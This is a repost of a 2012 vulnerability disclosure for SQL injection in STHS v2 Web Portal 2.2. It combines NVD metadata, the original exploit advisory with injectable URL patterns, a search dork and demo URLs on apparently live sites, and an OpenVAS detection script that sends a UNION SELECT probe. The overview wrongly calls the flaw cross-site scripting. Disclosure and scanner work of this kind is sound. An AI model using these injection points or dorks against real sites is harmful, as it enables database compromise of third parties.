CVE-2012-1217 : STHS v2 Web Portal ‘team’ parameter Multiple SQL Injection Vulnerabilities
Just updated the old story of this exploit, this CVE is created by me 2 years ago, check this on PacketStorm Security
Overview
Multiple cross-site scripting (XSS) vulnerabilities in STHS v2 Web Portal 2.2 allow remote attackers to inject arbitrary web script or HTML via the team parameter to (1) prospects.php, (2) prospect.php, or (3) team.php.
- CVE ID: 2012-1217 (see also: NVD)
- Bugtraq ID: 51991
- ISS X-Force ID: 73154
- Related OSVDB ID: 79598 79600
Impact
- CVSS Severity (version 2.0):
- CVSS v2 Base Score : 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
- Impact Subscore : 2.9
- Exploitability Subscore : 8.6
- CVSS Version 2 Metrics :
- Access Vector : Network exploitable; Victim must voluntarily interact with attack mechanism
- Access Complexity : Medium
- Authentication : Not required to exploit
- Impact Type : Allows unauthorized modification
References to Advisories, Solutions, and Tools
By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov.
External Source: XF
Name: sths-prospects-team-sql-injection(73154)
Hyperlink : http://xforce.iss.net/xforce/xfdb/73154
External Source: BID
Name: 51991
Hyperlink : http://www.securityfocus.com/bid/51991
External Source: MISC
Name : http://packetstormsecurity.org/files/109665/STHS-v2-Web-Portal-2.2-SQL-Injection.html
Hyperlink : http://packetstormsecurity.org/files/109665/STHS-v2-Web-Portal-2.2-SQL-Injection.html
External Source: MISC
Name : http://0nto.wordpress.com/2012/02/13/sths-v2-web-portal-2-2-sql-injection-vulnerabilty/
Hyperlink : http://0nto.wordpress.com/2012/02/13/sths-v2-web-portal-2-2-sql-injection-vulnerabilty/
CVE Standard Vulnerability Entry : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1217
================================================= STHS v2 Web Portal 2.2 SQL Injection Vulnerabilty ================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 ________ .__ ________ 3 7 \______ \ |__| ______/ __ \ ____ ____ _____ 7 1 | | \ | | / ___/\____ / _/ ___\ / _ \ / \ 1 3 | ` \| | \___ \ / / \ \___ ( <_> )| Y Y \ 3 3 /_______ /|__|/____ > /____/ /\ \___ > \____/ |__|_| / 3 7 \/ \/ \/ \/ \/ 7 1 1 3 >> The Underground Exploitation Team 3 3 3 7 7 1 [+] Site : http://www.Dis9.com 1 3 3 3 3 7 ########################################## 7 1 I'm Liyan Oz Member from 1337 DataBase 1 3 ########################################## 3 3 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # # AUthor : Liyan Oz # Title : STHS v2 Web Portal 2.2 SQL Injection Vulnerabilty # Vendor : http://www.simhl.net # Date : 10/02/2012 # Risk : Normal # Tested On : Backtrack Liyan Oz Edition # Contact : ariestiyansyah.rizky@gmail.com # Home : http://0nto.wordpress.com/ # Dork : "powered by SIMHL.net" # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # # Exploit : http://www.site.com/prospects.php?team=[SQLi]' http://www.site.org/prospect.php?team=[SQLi]' http://www.site.net/team.php?team=[SQLi]' # Demo : http://lnhs2.hostpo.net/prospect.php?team=1' http://www.lchv.biz/prospects.php?team=17' # Greetz to ======================================================================== # = My Lovely Junia Astri Damayanti = # # = Dis9 The Underground Exploitation Team [at] www.dis9.com = # # - Kedans Dz - Blackrootkit - Kalashinkov3 - KnockOut - Black-ID - # - Kowalski Howard - 7h1nkz3r0 - ettack - Ackrootkit - ph0n7ric - # - xi4ojin - Nimda - Killer - Dz - 2ext01 - Aoi Sora - X1 - brk - # # - Indonesian Backtrack Team , El N4ck0 , and all my friend ^_^ - #=======================================================================
Updated from Michael Meyer with script
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_STHS_51991.nasl 12 2013-10-27 11:15:33Z jan $
#
# STHS v2 Web Portal 'team' parameter Multiple SQL Injection Vulnerabilities
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_summary = "STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities
because the application fails to sufficiently sanitize user-supplied
data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the
application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
STHS v2 Web Portal 2.2 is vulnerable; other versions may also
be affected.";
if (description)
{
script_id(103421);
script_bugtraq_id(51991);
script_cve_id("CVE-2012-1217");
script_version ("$Revision: 12 $");
script_name("STHS v2 Web Portal 'team' parameter Multiple SQL Injection Vulnerabilities");
desc = "
Summary:
" + tag_summary;
script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/51991");
script_xref(name : "URL" , value : "http://xforce.iss.net/xforce/xfdb/73154");
script_xref(name : "URL" , value : "http://www.simhl.net/");
script_xref(name : "URL" , value : "http://0nto.wordpress.com/2012/02/13/sths-v2-web-portal-2-2-sql-injection-vulnerabilty/");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"risk_factor", value:"Medium");
script_tag(name:"last_modification", value:"$Date: 2013-10-27 12:15:33 +0100 (Sun, 27 Oct 2013) $");
script_tag(name:"creation_date", value:"2012-02-15 11:22:27 +0100 (Wed, 15 Feb 2012)");
script_description(desc);
script_summary("Determine if installed STHS is vulnerable");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
script_dependencies("find_service.nasl", "http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
if (revcomp(a: OPENVAS_VERSION, b: "6.0+beta5") >= 0) {
script_tag(name : "summary" , value : tag_summary);
}
exit(0);
}
include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
include("global_settings.inc");
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);
dirs = make_list(cgi_dirs());
foreach dir (dirs) {
url = string(dir, "/home.php");
if(http_vuln_check(port:port, url:url,pattern:"Site powered by.*SIMHL.net")) {
url = string(dir, "/prospects.php?team=-1%20union%20select%20openvas_sqli_test,saf,3,4,5,6,7,8,9,10,11,12");
if(http_vuln_check(port:port, url:url,pattern:"Unknown column 'openvas_sqli_test' in 'field list'")) {
security_warning(port:port);
exit(0);
}
}
}
exit(0);